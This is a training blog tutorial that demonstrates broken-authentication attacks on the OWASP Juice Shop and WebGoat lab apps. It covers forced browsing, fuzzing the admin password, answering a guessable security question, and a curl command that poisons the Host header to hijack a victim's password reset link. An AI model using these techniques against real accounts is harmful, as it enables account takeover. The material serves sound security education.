Broken Authentication and Session Management tutorial

Hello and welcome to this new episode of the OWASP Top 10 training series. In this Broken Authentication and Session Management tutorial, you will practice put your knowledge into action on hands-on attack examples. If you don’t know the theory behind this vulnerability, I highly recommend you read it first and then come back.

In this Broken Authentication and Session Management tutorial, you will learn:

• Authentication bypass attack example using forced browsing
• Exploit Broken Authentication using Weak credentials
• Broken Authentication and Session Management attacks example using a vulnerable password reset link
• Exploit Broken Authentication using a security question

Authentication bypass attack example using forced browsing

In this example, your goal is to access the challenge board on OWASP Juice Shop, which is normally not meant to be public. Single Page Web applications (SPA) typically use Ajax calls from a Front-end application. Therefore, all API endpoints should be included somewhere client-side, like JavaScript files.

1. Firstly, open Chrome Browser and visit Juice Shop
2. Then, right-click on the page and choose Inspect 
3. Under the Sources tab, choose the main-es2015.js file and beautify it using the {} button at the bottom of the window which shows the minified JavaScript file.
4. Then, locate the part where endpoints are declared using Ctrl+F on Windows or Command+F on Mac
5. From the list, you can see the score-board endpoint as shown below

6. Go to the URL: http://192.168.99.100:3000/#/score-board
7. Finally, you should see the scoreboard containing all the challenges.

Exploit Broken Authentication using Weak credentials

Let’s try to login as the admin user on OWASP Juice Shop. From our previous SQL injection tutorial, we know that the admin’s email is admin@juice-sh.op. So, let’s brute force his password using the worst 100 password dictionary.

Because Burp Suite Community Edition allows only throttled Bruteforce, we are going to use OWASP ZAP for this challenge. It is also a great opportunity to learn how to use OWASP ZAP in such a use case.

Capturing the vulnerable request on OWASP ZAP

1. Firstly, make sure that OWASP ZAP is properly configured.
2. Make sure that you have OWASP Juice Shop running.
3. On the Juice Shop top menu, click on the Account button, then on the Login button.

4. Then, enter admin@juice-sh.op in the email and a dummy password, and hit enter.
5. You should see a POST request coming through Zaproxy’s History tab.

6. As you can see, the response code is 401, which means that our authentication has failed.
7. On the request View, you can see the full POST request, including the POST data.

Brute force the admin password

8. Now, right-click on the request, and choose the Fuzz option.

9. Then, select the password field from the POST data of the login request and click on the Add button on the right.

10. Make sure that the payload type is Strings. Then, copy paste the list of passwords from the password dictionary and hit OK.

11. Finally, run the fuzzer, you should see a new Tab named Fuzzer appearing. After a while, the fuzzing finishes. You should see that we have a response code of 200 for the password admin123, meaning that the password we sent in that particular request is the admin’s password.

Broken Authentication and Session Management attacks example using a vulnerable password reset link

In this challenge, your goal is to hijack Tom’s password reset link and takeover his account on OWASP WebGoat.

Capturing the vulnerable password reset request

1. Firstly, make sure that you have OWASP WebGoat and WebWolf up and running.
2. Then, go to the password reset challenge number 6, as shown below

3. Next, scroll down and notice that you have the ability to reset your account’s password using the forgot password feature.

4. Then, in the history tab of OWASP ZAP, you can see a POST request as shown below

5. The POST request looks like this:

Exploiting the Password Reset feature

6. Now, note your cookie Header and email POST data, we will use them to construct the following curl command.

curl http://192.168.99.100:8080/WebGoat/PasswordReset/ForgotPassword/create-password-reset-link -H "Host: 192.168.99.100:9090/landing/evil" -b "JSESSIONID=Y-rAgt6BZhL5vY2yJaGH4Mx5ZPugPcK8WnwEd44Z" --data "email=tom%40webgoat-cloud.org"

7. In the request above, the -H option allows to add our own HTTP Headers. In this case, we poisoned the HTTP Host Header to point to http://192.168.99.100:9090/landing/evil. That way, we can capture the request made to /evil on WebWolf. In a real-life situation, the Host Header would point to a server controlled by the attacker. The -b option allows to add the Cookie, and the –data option allows to add the POST data.
8. After executing the curl command above, you can see that you get a request to WebWolf under the Incoming Requests menu, like the one below

9. Finally, we successfully hijacked the password reset link! Let’s copy it and use it in a legitimate password reset link. To do that, all you need is to send a password reset request to your email account, which is <user>@webgoat-cloud.org. On WebWolf, you can receive incoming emails on the Mailbox tab from the top menu.

10. As you can see, the password reset token looks like this: http://192.168.99.100:8080/WebGoat/PasswordReset/reset/reset-password/<password-reset-token>
11. All we have to do now is substitute <password-reset-token> with the one we hijacked earlier and visit the web page. You should see a password reset form as shown below.

12. Fill the password with whatever you want, then login as Tom using the new password.

12. Congratulations! You have compromised Tom’s password using a weak password reset feature.

Exploit Broken Authentication using a security question

You might think that security questions are secret, but it’s not quite the case. With the number of personal data people share on social media nowadays, security question answers can be found relatively easily. In this challenge, we are going to reset Bjoern’s password and access his account using a security answer he publicly shared.

In his talk, Bjoern shared that he owns a three-legged cat named Zaya. He used his email bjoern@owasp.org.

1. Firstly, go to the login from the top menu.
2. Then, choose forgot your password option at the bottom of the login form.
3. Finally, enter bjoern@owasp.org as the email, Zaya as the answer to the security question and a new password for Bjoern.
4. Congratulations! You can authenticate as Bjoern in Juice Shop.

As you can see, there are a lot of attack vectors which can be used to exploit a Broken Authentication and Session Management feature. Hopefully, you’ve learned something new.

New content will be released in the future. If you enjoy learning on this blog, make sure to subscribe to the newsletter below. We will send you updates each Friday!

If you enjoy learning by watching videos, here is one: